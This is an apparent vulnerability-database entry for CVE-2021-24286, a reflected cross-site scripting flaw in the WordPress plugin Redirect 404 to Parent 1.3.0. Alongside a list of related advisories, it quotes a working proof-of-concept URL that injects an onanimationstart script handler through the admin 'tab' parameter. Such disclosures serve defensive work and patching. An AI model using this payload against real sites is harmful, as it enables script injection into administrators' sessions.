WordPress Redirect 404 To Parent 1.3.0 Cross Site Scripting

🗓️ 29 Sep 2021 00:00:00Reported by 0xB9Type

packetstorm🔗 packetstormsecurity.com👁 208 Views

WordPress Redirect 404 To Parent 1.3.0 XS

Reporter	Title	Published	Views	Family All 13
0day.today	WordPress Redirect 404 to Parent 1.3.0 Plugin - Reflected Cross-Site Scripting Vulnerability	29 Sep 202100:00	–	zdt
CNNVD	WordPress plugin 跨站脚本漏洞	14 May 202100:00	–	cnnvd
CVE	CVE-2021-24286	14 May 202111:38	–	cve
Cvelist	CVE-2021-24286 Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting (XSS)	14 May 202111:38	–	cvelist
Exploit DB	WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting	29 Sep 202100:00	–	exploitdb
Nuclei	WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting	6 Jun 202603:01	–	nuclei
NVD	CVE-2021-24286	14 May 202112:15	–	nvd
OSV	CVE-2021-24286	14 May 202112:15	–	osv
Patchstack	WordPress Redirect 404 to parent plugin <= 1.3.0 - Reflected Cross-Site Scripting (XSS) vulnerability	23 Apr 202100:00	–	patchstack
Prion	Cross site scripting	14 May 202112:15	–	prion

`# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)  
# Date: 2/3/2021  
# Author: 0xB9  
# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip  
# Version: 1.3.0  
# Tested on: Windows 10  
# CVE: CVE-2021-24286  
  
1. Description:  
This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.  
  
2. Proof of Concept:  
wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);  
`

29 Sep 2021 00:00Current

0.1Low risk

Vulners AI Score0.1

CVSS 24.3

CVSS 3.16.1

EPSS0.52303